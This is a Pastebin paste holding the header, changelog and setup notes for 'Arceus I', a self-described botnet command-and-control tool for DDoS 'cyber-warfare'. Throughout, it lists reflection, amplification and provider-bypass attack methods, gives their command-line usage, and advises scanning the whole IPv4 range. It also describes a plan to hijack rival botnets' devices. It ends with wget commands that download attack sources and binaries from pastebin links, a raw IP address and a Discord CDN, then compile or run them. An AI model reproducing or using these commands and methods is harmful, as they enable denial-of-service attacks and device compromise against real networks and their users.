Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /*
- ╔═════════════════════════╗
- ║ Arceus I ║ ╔═════════════════════════╗
- ║ --- ║ ║ ARCEUS I : BETA ║
- ║ GL3.0 ║ ╚═════════════════════════╝
- ║ 666 ║
- ╚═════════════════════════╝
- ╔════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════╗
- ║ THIS VERSION WILL 'NOT' BE RELEASED TO THE PUBLIC DUE TO THE REDUNDANT ABUSE FROM THE COMMUNITY USING CYBER CYBER-WARFARE WEAPONS SUCH AS THIS.║
- ║ IF YOU ARE ABLE TO GET 'YOUR' HANDS ON THIS, PLEASE RESPECT THE AUTHORISATION AND WORK THE DEVELOPERS HAVE PUT INTO THIS SOURCE / PROJECT BETA.║
- ╠═════════════════════════════════════════════════════════════════╦══════════════════════════════════════════════════════════════════════════════╣
- ║ LICENSING : GNUV3 [GNU GENERAL PUBLIC LICENSE VERSION 3.0] ║ PROJECT ARCEUS IS A C2 SOURCE USING A CHANNEL CONNECTION TO RUN A DISPLAY ║
- ║ VALID : 03/23/19 ║ SCREEN ON THE CONNECTION STATED VIA THE PORT 'SCREENED' TO. THIS PROJECT ║
- ║ EXPIRY : 03/23/22 ║ HAS CERTAIN DEPENDENCIES IN ORDER TO PROPERLY COMPLY WITH EACH ADMIN USING ║
- ║ -- ║ ARCEUS. WE ARE IN NO JEOPARDY IF YOU ARE CAUGHT BY ANY MEANS. MEANING ANY ║
- ║ STATE : PRIVATE ║ TYPE OF AUTHORITY, THIS APPLIES TO POSSESSION AND USAGE OF THIS PROJECT. ║
- ║ OWNERSHIP : N/A ║ -- ║
- ║ NAME : ARCEUS I ║ THIS PROJECT WAS DESIGNED BOTH FOR ME AND JACK'S' USAGE ONLY. THIS WORK IS ║
- ║ -- ║ UNDER 2 COUNTS OF LICENSING. SPECIFICALLY GNU AS WELL AS A PRIVATE PATENTING ║
- ║ CCR : XXX-223-389 ║ UNDER MY OWN DIVISION. NO COVERED WORK SHALL BE DEEMED PART OF AN EFFECTIVE ║
- ║ CIPHER : SHA-512 , AES-BYTE , CIPHER-TLS ║ TECHNOLOGICAL MEASURE UNDER ANY APPLICABLE LAW FULFILLING OBLIGATIONS UNDER ║
- ║ GH-ID : ZCH-CRI.SUCC ║ ARTICLE 11 OF THE WIPO COPYRIGHT TREATY ADOPTED ON 20 DECEMBER 1996, OR ║
- ║ -- ║ SIMILAR LAWS PROHIBITING OR RESTRICTING CIRCUMVENTION OF SUCH MEASURES. ║
- ║ OBJ-TYPE : C2 SOURCE X TELNET LAYER ║ -- ║
- ║ VSSH : N/A ║ YOU MAY CONVEY A COVERED WORK IN OBJECT CODE FORM UNDER THE TERMS OF SECTIONS║
- ║ OS_TYPE : CENT_OS [6] - [7] ║ 4 AND 5, PROVIDED THAT YOU ALSO CONVEY THE MACHINE-READABLE CORRESPONDING ║
- ║ -- ║ SOURCE UNDER THE TERMS OF THIS LICENSE. ║
- ║ BUILD : BETA [RELEASE BEFORE VERSION I] ║ -- ║
- ║ DESC : NET-WSS ║ ║
- ║ PRJ-VAS : 6949-3853-9891 ║ THIS CODE WAS FOUNDED AND CREATED BY BOTH TRANSMISSIONAL AND FLEXINGONLAMERS.║
- ║ -- : ║ WE HAVE THE ENTITLED AND ORIGINAL RIGHTS TO EDIT OR UPGRADE THIS FUNCTIONAL ║
- ║ -- : ║ CODE. ║
- ║ DEV-ALIAS : TRANSMISSIONAL / FLEXINGONLAMERS ║ YOURS TRULY, ZACH, TRANSMISSIONAL ║
- ╚═════════════════════════════════════════════════════════════════╩══════════════════════════════════════════════════════════════════════════════╝
- Another project me and jack have decided take on after a break of coding project 'Katura'
- This new project is designed to fulfil the potential of a C2 source, outcompeting other C2 sources.
- We have decided to try to recreate this source into such a tool where it will completely put
- 'Mirai' RCE-WGET exploitation to complete shame.
- This will be a continuous and ongoing project. We are hoping to soon create this into something that
- exceeds the capabilities that are set by other developers creating such 'cyber-warfare' tools
- as this.
- ---
- Both me and Jack, Have the certain capabilities to create something so unique and better, through
- the use of combined networking and programming knowledge.
- This is a challenge both me and Jack, have decided to take on.
- Till next time.
- ___________________________________________________________________________________________________
- ╔════════╗
- ║BETA - 1║
- ╚════════╝
- Created C2 Base || Process Terminator
- Added: AddUserFunction || Added UserAccounts || Added Alternative Chatroom Source || Added Functional Arch Detector (working on it, bc is broken)
- Added: Added Portscanner || Added IPGeolocation
- Added: Functional Logs, Includes ["IP", "Error", "LogOut", "Shell", "server"]
- Added: UserID(s) || MD5Format For User Information
- =========================
- ╔════════╗
- ║BETA - 2║
- ╚════════╝
- Managed Bot/Client
- Added New Layer4 UDP Methods Including ["STOMP", "HOME", "RAID"]
- Added New Layer4 TCP Methods Including ["TCP-CRI", "TCP-ZACH"]
- Added: Arch Detector via ["x86_64", "x86_32", "Arm4", "Arm5", "Arm6", "Arm7", "Mips", "Mipsel", "Sh4", "Ppc", "spc", "M68k", "Arc"]
- Added: Distro Detector via ["Ubuntu/Debian", "Gentoo", "REHL/Centos", "Open Suse"]
- Added: DevType via ["Python", "python3", "perl"]
- Added: Port Detector that dignifies Device Type via ["telnet", "ssh"] etc
- =========================
- ╔════════╗
- ║BETA - 3║
- ╚════════╝
- Managed C2/CnC
- Added: Logging via ["Arceus_Shell.log", "Arceus_IP.log", "Arceus_Connection.log", "Arceus_Logout.log", "Arceus_Error.log"] // We are logging username commands, IPs, errors, shell attempts, and User Log-Outs
- Added: Edits to (HELP) Including ["INFO", "BOTS"]
- Color Codes were only Inputed for the Katura_IP.log || Now being inputted for the connection handler via screen
- IPLookup Script And Snippet taken from "Cayosin", credits to the original developer of both the script and snippet of code.
- =========================
- ╔════════╗
- ║BETA - 4║
- ╚════════╝
- Added IPHM Implementation > IP-Header Based methods now working.
- Added Methods: ["LDAP", "NTP", "SSDP", "TFTP", "PORTMAP"]
- Added New functions, including an external SSH Scanner which uses IPBlocks based by country.
- Also added alternative functions for Banning, {We are using IPTables to ban users via IP}
- =========================
- ╔════════╗
- ║BETA - 5║
- ╚════════╝
- Added IPHM Extensions for the following methods: ["LDAP", "SSDP", "NTP", "TFTP", "PORTMAP"]
- Added IPHM Scanners for the methods above.
- Added process killers for all methods and scanners based over IPHM
- Added External Scanner and IPBan system using IPTables
- Added SystemDetection Into Client (We are displaying system type) via: ["Linux", "windows", "android"]
- Added External Installation Script for IPHM Downloads. includes scanners and attack scripts. command = .install
- =========================
- ╔════════╗
- ║BETA - 6║
- ╚════════╝
- Added: new substrate format for SCKT_V2
- Added: a new custom 'LD_KERNEL' preload using a prime buffer size
- Added: New Char Injection method using Katura's binary execution system
- Added: & Patched all attack output ASCII as well as grammar
- Added: NetworkDelimiter, Allows screen to be more stable !
- Added: SPECIAL Attacks : ["ZCH-WSS, "STL-BOO", "EFT-PWR", "PMP-PMP","ZCH-CRI"]
- Added: New IPHM Based Methods (Yubina Collection); ["prowin", "syn9", "winseqid", "winsyn"]
- Added: New Process Killer for ALL IPHM Based methods.
- Added: Seperate commands for installing scanners and attack scripts.
- Added: New Methods To IPHM Banners, also changed the main menu and added {.iphm};
- Added: Seperate Section for scanners. (under Admin menu); Changed command from {.next} to {.scanners}
- Fixed: Reply message for all IPHM Based attacks, now showing each method and kill command.
- Fixed: all menus, added new options, and changed main menu.
- Added: new methods to IPHM Menu: ["rawudp", "rawstd", "ovhbypass", "nfobypass", "cfbypass"]
- Added: new process killer for all scanners and scripts. external file: Process_Killer.py
- Method OVHBYPASS = xDoS
- Method NFOBYPASS = RAWUdp
- Method CFBYPASS = CF_BYPASS
- Method BO4BYPASS = xts3
- =========================
- ╔════════╗
- ║BETA - 7║
- ╚════════╝
- Additions:
- Added: New BW Based methods: ["DOMINATE", "VSE", "TELNET", "TCPABUSE", "UDPABUSE", "DOMINATE", "ESSYN", "CSYN", "ZSYN", "XSYN", "ISSYN"]
- Added: New Reflection Based Methods: ["CHARGEN", "SENTINEL", "NETBIOS", "MSSQL", "TS3"]
- Added: New Bypass Based Methods: ["XTS3/BO4BYPASS"]
- Added: New Process_Killer seperately for Scanners || This is external!
- Added: All New Methods to IPHM_Installer || install.py
- Added: New Menu for {.iphm} || New methods added!
- Added: New Snippets / Attack commands for new methods! || Also added new "Attack.Banners" for new methods.
- Added: New methods to Process_Killer
- Added: Section for links to all files! (Should be below all of these updates)
- Added: Following Linux Distros to DistroDetector in client/bot: ["Fedora", "Redhat", "Arch", "FreeBSD"]
- Added: Full section with Installation Logs, Usage Logs, and Compilation Logs for All IPHM Based Methods
- Added: new filepaths for all IPHM based files. Location: /root/amp/; all paths listed below the installs.
- Added: new filepaths for ALL external based files. paths: scripts="/root/scripts/" C2="/root/c2" BOT="/root/bot/" IPHM="/root/amp/"
- Fixed: Process_Killer For IPHM Based Methods || Now kills ONLY attack processes instead of scanners!
- Fixed: Source Size: All menus are now 1 line. lmfao
- Fixed: Defined STD_SIZE: Noticed issue inside of client, (I defined the default packet size for STD as 1460) -
- (When using HEX it calls to STD and uses it to send the attack, whilst adding PacketSize for username input) -
- (It goes to read the username input for packetsize but it can not be done due to STD Packetsize being defines by default) -
- (commented out std def and added packetsize to HEX) - (Better exp below)
- since trim_integer defined the packetsize by default, trim_integer had to change STD up and switch it from (std_size) to (Packetsize) and limited certain methods inside of the pcm to use the
- defined default for packet size giving users the chance to change the packet size to whatever they desire inside of Method: HEX
- Changed STD Strings to make attacks more effective
- Redefined Default PacketSize for STD - Using for certain methods: Mainly STD alone
- Removed: IPHM Based Methods: ["rawudp", "rawstd"] - Replaced with: ["UDPABUSE", "TCPABUSE"]
- Removed: First menu for process killer (Wasnt showing on screen and was fucking with the tsc)
- Removed: UserID(s) || MD5Format For User Information || Update: 1
- Removed: UserInfo /UserInformation Menu || Update: 4
- Removed: All extra scanner process killer commands > all now in one command < runs IPHM_Scanner_Proces_Killer.py
- Removed: DistroDetection for OS's: ["Redhat", "Arch", "FreeBSD", "Fedora"]
- Creating method `LOCKDOWN` || This is fucked.
- `LOCKDOWN` Explained: Lockdown Logs all device connections. Connects to those devices, reads connections, spams those servers with connections causing all transmitted_successfully C2's to crash
- then kills all connections and removes traces of files, and alternatives. locks the device with a 49 character password, re-roots the device twice and closes the connection.
- Created Process_Killer for all IPHM Based Scanners
- Created Process_Killer for all IPHM Based Attacks
- Created New IPHM Installer for all attack scripts and Scanners
- =========================
- ╔════════╗
- ║BETA - 8║
- ╚════════╝
- Added: VIP Users
- Added: VIP Only access to zachs custom methods
- Added: Logging Directory for all .log files. || This includes the following: ["Arceus_Logout.log", "Arceus_IP.log", "Arceus_Connection.log", "Arceus_C2.log"]
- Added: Directories for all files. (Instead of using root dir for all files we are using subdirs!)
- Added: New Process Killer for IPHM. files include the following: ["IPHM_Attack_Process_Killer.py", "IPHM_Scanner_Process_Killer.py"]
- Added: Methods to the IPHM AutoInstaller: (Zach's Methods): ["hun-fun", "ass-crk", "eft-pwr", "pmp-pmp", "zch-cri"]
- Added: New Banner for Failed User logins: Old="Login Error!\r\nIf you run into this issue please contact the owner!"
- (Working On New Arch Detector which works via C2 - We are reading Device types!)
- Zach > Read the "exp.txt" within this folder < it explains what all of the directories are for, thanks <3
- =========================
- ╔════════╗
- ║BETA - 9║
- ╚════════╝
- Added: introducing substrate v4, now uses EPOLL to create dynamic_socket library
- Added: arceus_substrate_device_data_v4, we will soon create an arch detection off of this.
- Added: arceus_substrate_telnet_data_v4, our own very first telnet transmission system
- Added: socket_interpretation_block_v1, now kills off new socket if a new port is being screened
- Added: trim_remove2, this is a better modified version of trim, a lot more effective, this should help with dual variable parsing
- Added: socket_intepretation_modified, now saves client_address info -> save file_content system
- Added: arceus_broadcast -> now saves the broadcast_data_psl so output is faster to broadcast
- Added: SUCC/FUCC V3, instead of using ping/pong v1, just seems to fail on each network launch
- Added: arc_substitute added, for substrate compatibility, will be removed once socket_bind_bypass has been created for arc_10
- Added: arceus' into sprintf data output, for ASCII, this replaces 'botnet'
- Added: clear_arceus_broadcast now restores all ASCII to broadcast a lot faster, increased network usage too
- Added: arceus_file_searcher_v3, now searches [arceus.txt] without creating any other subprocesses [memory based]
- Added: new IP format state : (addr.sin_addr.s_addr & 0xFF00) >> 8,(addr.sin_addr.s_addr & 0xFF0000) >> 16,(addr.sin_addr.s_addr & 0xFF000000) >> 24);
- Added: arceus_client_address, automatically formats using '0xFF0'
- Added: port 64121 for attack port, instead of port 80.. seems heavily filtered for obvious reasons
- Added: changed device names, just makes it easier for brand new arch detection in next update
- Added: socket_interpretation_II, now fully into effect, extremely fast.. huge difference in speed
- Added: added systematic variable names, all modified so no code cannot be leeched
- Added: increased error handling output for all 'perror' outputs. may help with arch detection and device data
- Added: dword alternative for all unsigned_integers incase we want a set number (just incase number work gets a little tricky)
- Added: file descriptor alternative size, so network and CPU usage is kept to a minimum once mass attacks come into play.
- Added: created files for custom attack methods and created commands
- Added: successful_transmission - this will show if a client has successfully connected to our screen hosted on another port
- Added: bindinginterpreter - this should minimise binding errors using non_block_socket
- Added: buffer_size_string_compare, this compares the buffer size to each string to stop data allocation from possibly breaking
- Added: trim_integer, this is so delimiters will not cause a problem between the parsed data, ie : the ASCII output
- Added: arceus_buffer_size, this is now dependent on memset, stable data allocation, although, not full tested yet..
- Added: decreased char sizes of each individual integer or data type.. less network usage in the screen.. also not tested
- Added: added ASCII box around the includes, just to tidy stuff up.. makes it look neat instead of the use of slashes
- Added: fixed jack's grammar because it extremely annoys me, due to my precise use of language
- Added: struct names have been reduced and changed
- Removed: substratev3's old socket usage
- Removed: substrate_device_data_v3 - this has been replaced with a better and newer version
- Removed: substrate_telnet_data_v3 - this has been replaced with a better and newer version
- Removed: ping/pong v1 transmission system - too slow, so i created my own version of it.
- Removed: client_data_t - it was uneeded for substrate
- Removed: telnetWorkerv1 - this has also been removed from substrate
- Removed: integer called 'botnet' - replaced with 'arceus'
- Removed: value called 'thefd' <- everyone uses the same variable name..
- Removed: deluser function, this will be added into the newer version, currently causing certain compilation errors, just need to make sure each build compiles
- Removed: definition for 'MAXFDS' we already had it defined before so there was no need to keep another value just for file descriptors.
- Removed: find_line, as we have implemented it into 'arceus_file_searcherv3'
- Removed: definition for 'Allies' there is no need for it
- Fixed: ASII banner for help, some lines were out of place.
- Fixed: Attack outputs, due to my laziness of using ctrl+h to replace certain variable names
- Fixed: Developer credit text, Just made them parallel with each other
- Fixed: arch_detection_data = this should allow me to fix the arch detection in the next beta-build of arceus.
- Fixed: trim_removev2, now only removes certain characters, it shouldn't trim off user input now
- Fixed: buffer_size, some functions were not being outputted as the buffer size was set too low..
- Fixed: resolver function, just a minor tweak to the user-agent that is sent to the API.
- Updated: substrate_device_data - now char's each individual device seperately, also creates an unsigned_int for the IP
- Updated: substrate_telnet_data - proposes a better output system by setting the IP and 'transmitted_successfully' variables for max_file_descriptor value
- Updated: arceus_broadcast - now uses SUCC/FUCC V3 instead of the default socket usage 'ping/pongv1'
- Updated: trim function now renamed to 'trim_removev2' - doesn't trim off user input
- Updated: arceus_file_searcher - now uses more checks, increases the c2's security
- =========================
- ╔═════════╗
- ║BETA - 10║
- ╚═════════╝
- Added: New IPHM_Scanner_Process_Killer || IPHM_Attack_Process_Killer
- Added: Second Page for IPHM Based Attack methods
- Added: New methods to the IPHM_Method_Installer || This includes Zachs `custom` methods
- Added: New Arch Detection || Arch Display for device type/count
- Added: Test Function for new Subdomain/DNS scanner
- Added: New `ERROR` Menu for failed logins.
- Added: New Load_Banner for the main banner. (Startup) - testing
- Added: New scanners inside of the "scanners" menu.
- Added: VIP Menu for VIP Users
- Added: New banner for Admin/VIP Failure (If the user is not admin and or VIP and they go to use a command meant for those accounts, it will display the new banner)
- Added: Port Input for all IPHM Based methods in which allow it
- Added: New Logs for ["Compilation_Logs", "Attack_Scripts", "Scanners", "Script_Usages"] || This is for IPHMV2 Menu {.iph2}
- Added: Seperate Directories for each file. Explenation below.
- Added: New Device Based Methods Via: ["VSE", "SMITE", "HOLD", "HEX", "CRASH", "HOME", "RAID"]
- Added: New IPHM Based Methods Via: [" "]
- Added: New attack outputs for IPHM Based methods (We are displaying IP, PORT, TIME, METHOD, USAGE, THREADS, PPS)
- Added: New attack outputs for Device Based methods.
- Added: Manual port input for all IPHM Based Methods || Port input coming soon
- Added: All new IPHM Based methods for IPHM Menu v2 {.iph2} || this includes the following:
- Added: New sub-directories for all IPHM-Reflection based methods: files have own directories
- Added: New sub-directory file paths for all IPHM-Reflection Based methods
- Added: New IPHM Scannable Methods Via: ["dns", "mdns", "db2", "arceus", "echo", "snmp", "memcache", "rip", "heartbeat]
- Added: New IPHM Bandwidth methods (Tcp-collection): ["TCP-AMP", "TCP-RST", "TCP-FIN", "TCP-XMAS", "TCP-ACK"]
- Added: New IPHM Bandwidth Methods (Extra Methods III): ["grenade", "zap", "rawudp", "bogus", "wizard"]
- Added: New IPHM Bandwidth Methods (Extra Methods VI): ["UDP_VSE", "UDP_VSE2", "EJUNK"]
- Added: New IPHM Bandiwdth Methods (Layer7 Methods I): ["OMEGA", "ARME"]
- Added: New IPHM Directories for "layer7" and "layer4" methods:
- Added: New VIP Section in `.ipm2` / IPHM Menu v2 || These methods are Combos in which use several methods to send attacks to the desired users inputted IP/HOST
- Added: Owner accounts (Owner access)
- Added: New "CNC" Tool, this allows users to send an `attack` to another cnc causing it to overload. basically just raises the usercount and crashes the screen lol
- Fixed: IPHM_Process_Killer's for both `Attack` and `Scanner`
- Fixed: Admin Menu. Now only administrators can view this.
- Fixed: Attack_Process_Killer || Command was switched to ".killattk" and is now back to its original state as ".kill" lower and CAPS
- Removed: SSH/ZONE MassScan || Not Needed (Adding an upgraded version soon)
- Updated: the entire main menu
- Updated: the entire help menu
- Updated: the entire admin menu
- Updated: the entire .iphm menu
- Updated: all of the defines in beta version 10 > look below (:
- Combo Explenation:
- msqdnm = MDNS and MSSQL (GREAT FOR OVH)
- tfdnp = TFTP and MDNS (also great for ovh)
- lndp = NTP and LDAP
- Small explenation on files and directories.
- ==================================================
- Directories needed:
- c2, bot
- ==================================================
- inside of the c2 folder you will need the following folders. || The IPHM_Method_Installation Script should make the `AMP` dir when ran
- scripts, logs, amp,
- ==================================================
- inside of the amp folder you will need the following folders. || The IPHM_Method_Installation Script should make these when ran
- methods, lists, scanners
- ==================================================
- inside of the methods folder you will need the following folders. || The IPHM_Method_Installation Script should make these when ran
- Bandwidth, Reflection
- ==================================================
- for the (amp) folder, the install.py should set it up on its own and make all of the directories for such on its own.
- ==================================================
- files needed inside of (bot) folder.
- bot.c Arceus.py
- ==================================================
- Files needed inside of (c2) folder.
- Arceus.c, arceus.txt, IPHM_Method_Installation.py, resolver.h
- ==================================================
- Files needed inside of (c2/scripts) folder.
- IPHM_Attack_Process_Killer.py, IPHM_Scanner_Process_Killer.py, scan.py
- if this helps < here ya go
- mkdir c2; mkdir bot; cd c2; mkdir logs; mkdir scripts
- ==================================================
- the "resolver.h" is a C-Header and is included whithin the c2 source itself. THIS IS NEEDED IN ORDER TO COMPILE SAID FILE.
- the "IPHM_Method_Installation.py" is the IPHM Script installer, this is needed in the c2 directory. mainly because since we are inside of the c2 dir
- we can not push back to run things, and it would make it impossible to run the files off of the c2, so we have to call to the amp/methods/ folder inside of the c2 dir.
- the "arcues.txt" is our login file. should look like this: Jack root admin || Input: <Username> <Password> <Level> || levels="admin","normal","vip"
- the "IPHM_Attack_Process_Killer.py" is our IPHM Attack Process killer. just makes it easier to kill shit.
- the "IPHM_Scanner_Process_Killer.py" is our IPHM Scanner process killer. just makes it easier to kill shit.
- the "scan.py" is our SSH Scanner. scans IP Blocks AutoMatically. pretty dank.
- NEW:
- the "wget.py" is our installation script. this install the process killers, and extra shit we need to kill everything and run smoothly c:
- ==================================================
- Inside of the /c2/amp/methods/reflections/ Directory we are now making directories for all scannable/Reflection Based Methods: the install script does this on its own
- ==================================================
- Developers:
- IPHM_Attack_Process_Killer - Created By Cri
- IPHM_Scanner_Process_Killer - Created By Cri
- IPHM_Attack_Process_Killerv2 - Created By Cri
- IPHM_Scanner_Process_Killerv2 - Created By Cri
- install.py - Created By Cri
- IPHM_Method_Installationv2.py - Created By Cri
- Reaper Attack Script - Created By Cri
- Reaper Scanner Script - Created by Cri
- Arceus Attack Script - Created By Cri
- Arceus Scanner Script - Created by Cri
- Arc Method - Created By Cri
- wget.py - Created By Cri
- scan.py - Created By Cri
- Arceus.py - Created By Cri
- bot.c - Created By Cri
- Arceus I (1-8) - Created By Cri
- Arceus I (10) - Created By Cri
- cncv2.py - Created by cri
- lockdown.c - Created by cri
- (All logs and directory changes) - Created By Cri
- ===================================================
- Arceus I (9) - Created By Zach
- HUN-FUN Attack Script - Created By Zach
- ASS-CRK Attack Script - Created By Zach
- EFT-PWR Attack Script - Created By Zach
- PMP-PMP Attack Script - Created By Zach
- ZCH-CRI Attack Script - Created By Zach
- ===================================================
- resolver.h - Unsure
- iplookupapi.php - Created By Snickers
- ==================================================
- ╔═════════════════════════════════════════════════════════╗
- ║ Arceus I - Compilation logs - Attack Scripts - Scanners ║
- ╚═════════════════════════════════════════════════════════╝
- # LDAP - 0 Error Logs - 0 Warning Logs || Compile Success! || LDAPSCAN - 0 Error Logs - 3 Warning Logs || Compile Success!
- # SSDP - 0 Error Logs - 0 Warning Logs || Compile Success! || SSDPScan - 0 Error Logs - 3 Warning Logs || Compile Success!
- # NTP - 0 Error Logs - 0 Warning Logs || Compile Success! || NTPScan - 0 Error Logs - 3 Warning Logs || Compile Success!
- # CHARGEN - 0 Error Logs - 0 Warning Logs || Compile Success! || CHARGENSCAN - 0 Error Logs - 5 Warning Logs || Compile Success!
- # SENTINEL - 0 Error Logs - 0 Warning Logs || Compile Success! || SETNINTELSCAN - 0 Error Logs - 3 Warning Logs || Compile Success!
- # NETBIOS - 0 Error Logs - 0 Warning Logs || Compile Success! || NETBIOSSCAN - 0 Error Logs - 3 Warning Logs || Compile Success!
- # MSSQL - 0 Error Logs - 0 Warning Logs || Compile Success! || MSSQLSCAN - 0 Error Logs - 3 Warning Logs || Compile Success!
- # TS3 - 0 Error Logs - 0 Warning Logs || Compile Success! || TS3SCAN - 0 Error Logs - 3 Warning Logs || Compile Success!
- # PORTMAP - 0 Error Logs - 0 Warning Logs || Compile Success! || PORTMAPSCAN - 1 Error Logs - 0 Warning Logs || Using New portmap Scanner! Results: 0 Error Logs - 3 Warning Logs || Compile Success!
- # TFTP - 0 Error Logs - 0 Warning Logs || Compile Success! || TFTPSCAN - 1 Error Logs - 3 Warning Logs || Using New TFTP Scanner! Results: 1 Error Logs - 3 Warning Logs || Compile Fail ):
- # TELNET - 0 Error Logs - 0 Warning Logs || Compile Success!
- # VSE - 0 Error Logs - 0 Warning Logs || Compile Success!
- # DOMINATE - 0 Error Logs - 0 Warning Logs || Compile Success!
- # ZSYN - 0 Error Logs - 0 Warning Logs || Compile Success!
- # XSYN - 0 Error Logs - 0 Warning Logs || Compile Success!
- # CSYN - 0 Error Logs - 0 Warning Logs || Compile Success!
- # ESSYN - A couple thousand errors.. DO NOT COMPILE, must use as Raw C File and set permissions
- # ISSYN - A couple thousand errors.. DO NOT COMPILE, must use as Raw C File and set permissions
- ==================================================
- ╔══════════════════════════════════════════════════════╗
- ║ Arceus I - Script Usages - Attack Scripts - Scanners ║
- ╚══════════════════════════════════════════════════════╝
- ###############
- # Ok, so trim_integer suggest using -1 for all IPHM based methods < pps should = -1
- # Also, when scanning, make sure to set the $delay to 1ms || $IPSTART is the beginning IPRange Ex: 0.0.0.0 || $IPEND is the finish_integer IPRange Ex: 255.255.255.255 || This will scan everything!
- ###############
- # LDAP: ./ldap $IP $PORT $LIST $THREADS $PPS $TIME || LDAPSCAN: ./ldapscan $IPSTART $IPEND $LIST $THREADS $DELAY
- # SSDP: ./ssdp $IP $PORT $LIST $THREADS $PPS $TIME || SSDPSCAN: ./ssdpscan $IPSTART $IPEND $LIST $THREADS $DELAY
- # NTP: ./ntp $IP $PORT $LIST $THREADS $PPS $TIME || NTPSCAN: ./ntpscan $IPSTART $IPEND $LIST $THREADS $DELAY
- # CHARGEN: ./chargen $IP $PORT $LIST $THREADS $PPS $TIME || CHARGENSCAN: ./chargenscan $IPSTART $IPEND $LIST $THREADS $DELAY
- # SENTINEL: ./sentinel $IP $PORT $LIST $THREADS $PPS $TIME || SENTINELSCAN: ./sentinelscan $IPSTART $IPEND $LIST $THREADS $DELAY
- # NETBIOS: ./netbios $IP $PORT $LIST $THREADS $PPS $TIME || NETBIOSSCAN: ./netbiosscan $IPSTART $IPEND $LIST $THREADS $DELAY
- # MSSQL: ./mssql $IP $PORT $LIST $THREADS $PPS $TIME || MSSQLSCAN: ./mssqlscan $IPSTART $IPEND $LIST $THREADS $DELAY
- # TS3: ./ts3 $IP $PORT $LIST $THREADS $PPS $TIME || TS3SCAN: ./ts3scan $IPSTART $IPEND $LIST $THREADS $DELAY
- # PORTMAP: ./portmap $IP $PORT $LIST $THREADS $PPS $TIME || PORTMAPSCAN: ./portmapscan $IPSTART $IPEND $LIST $THREADS $DELAY
- # TFTP: ./sentinel $IP $PORT $LIST $THREADS $PPS $TIME || SENTINELSCAN: its broken :/ ive tried 3 different versions LMFAO
- # PROWIN: ./prowin $IP || Note this attack does not stop on its own, MUST KILL PROCESS!
- # WINSYN: ./winsyn $IP || Note this attack does not stop on its own, MUST KILL PROCESS!
- # WINSEQID: ./winseqid $IP || Note this attack does not stop on its own, MUST KILL PROCESS!
- # YUBINA: ./yubina $IP || Note this attack does not stop on its own, MUST KILL PROCESS!
- # OVHBYPASS: ./ovhbypass $IP $PORT $TIME UDP || Source has 2 diffent methods: UDP and HTTP < we are using UDP
- # NFOBYPASS: ./nfobypass $IP $PORT
- # CFBYPASS: php CF_Bypass $URL $LIST $THREADS $TIME || Needs a proxy list || Url must be http://SITE/ or https://SITE/
- # BO4BYPASS: ./bo4bypass $IP $PORT $PPS $TIME
- # VSE: ./vse $IP $THREADS $PPS $TIME
- # DOMINATE: ./dominate $IP $PORT $THREADS $PPS $TIME
- # TELNET: ./telnet $IP $THREADS $PPS $TIME
- # TCP_ABUSE: ./tcp_abuse $IP $PORT $THREADS $PPS $TIME
- # UDP_ABUSE: ./udp_abuse $IP $PORT $THREADS $PPS $TIME || SO this method is a server suspended, apparently you can go after ranges this is the optional input: ./udp_abuse $IP $PORT $THREADS $PPS $TIME $STARTIP $ENDIP
- # CSYN: ./csyn $IP $PORT $THREADS $PPS $TIME
- # XSYN: ./xsyn $IP $PORT $THREADS $PPS $TIME
- # ZSYN: ./zsyn $IP $PORT $THREADS $PPS $TIME
- # ISSYN: ./issyn.c $IP $PORT $THREADS $PPS $TIME
- # ESSYN: ./essyn.c $IP $PORT $THREADS $PPS $TIME
- ==================================================
- Installs I:
- ==================================================
- Scannable Methods I:
- wget -q https://pastebin.com/raw/cRt6CBpb -O ldap.c && gcc -o ldap ldap.c -pthread
- wget -q https://pastebin.com/raw/Yy7MrvmU -O ldapscan.c && gcc -o ldapscan ldapscan.c -pthread
- wget -q http://pastebin.com/raw/vpbXuKVA -O ssdp.c; gcc -o ssdp ssdp.c -pthread
- wget -q http://pastebin.com/raw/7uNYKs4c -O ssdpscan.c; gcc -o ssdpscan ssdpscan.c -pthread
- wget -q http://pastebin.com/raw/PJeYk4Bc -O ntp.c; gcc -o ntp ntp.c -pthread
- wget -q http://pastebin.com/raw/XWFfm5hh -O ntpscan.c; gcc -o ntpscan ntpscan.c -pthread
- wget -q http://pastebin.com/raw/Kktvq2pz -O chargen.c; gcc -o chargen chargen.c -pthread
- wget -q http://pastebin.com/raw/FpeqRp6K -O chargenscan.c; gcc -o chargenscan chargenscan.c -pthread
- wget -q http://pastebin.com/raw/jmPdAPPM -O sentinel.c; gcc -o sentinel sentinel.c -pthread
- wget -q http://pastebin.com/raw/gX0waM82 -O sentinelscan.c; gcc -o sentinelscan sentinelscan.c -pthread
- wget -q http://pastebin.com/raw/D0UFWXmU -O netbios.c; gcc -o netbios netbios.c -pthread
- wget -q http://pastebin.com/raw/V6jTyjbi -O netbiosscan.c; gcc -o netbiosscan netbiosscan.c -pthread
- wget -q http://pastebin.com/raw/RsYN9wYs -O mssql.c; gcc -o mssql mssql.c -pthread
- wget -q http://pastebin.com/raw/3MT59SGE -O mssqlscan.c; gcc -o mssqlscan mssqlscan.c -pthread
- wget -q http://pastebin.com/raw/LAb0nSbh -O ts3.c; gcc -o ts3 ts3.c -pthread
- wget -q http://pastebin.com/raw/bgraxVGt -O ts3scan.c; gcc -o ts3scan ts3scan.c -pthread
- wget -q http://pastebin.com/raw/PNDMd2CF -O portmap.c; gcc -o portmap portmap.c -pthread
- wget -q http://pastebin.com/raw/LH6yB0Yt -O portmapscan.c; gcc -o portmapscan portmapscan.c -pthread
- wget -q http://pastebin.com/raw/De6amhpb -O tftp.c; gcc -o tftp tftp.c -pthread
- wget -q http://pastebin.com/raw/f1TkRk0x -O tftpscan.c; gcc -o tftpscan tftpscan.c -pthread
- ==================================================
- Server Methods I:
- wget -q http://98.143.148.177/Archive/reprobate/layer4/TCP/Collections/yubina_collection/Files/prowin -O prowin; chmod 777 prowin
- wget -q http://98.143.148.177/Archive/reprobate/layer4/TCP/Collections/yubina_collection/Files/yubina -O yubina; chmod 777 yubina
- wget -q http://98.143.148.177/Archive/reprobate/layer4/TCP/Collections/yubina_collection/Files/winseqid -O winseqid; chmod 777 winseqid
- wget -q http://98.143.148.177/Archive/reprobate/layer4/TCP/Collections/yubina_collection/Files/winsyn -O winsyn; chmod 777 winsyn
- ==================================================
- Zachs Methods I:
- ==================================================
- Bypass Methods I:
- wget -q https://cdn.discordapp.com/attachments/564177458631409694/574420527125364757/xDoS -O ovhbypass; chmod 777 ovhbypass
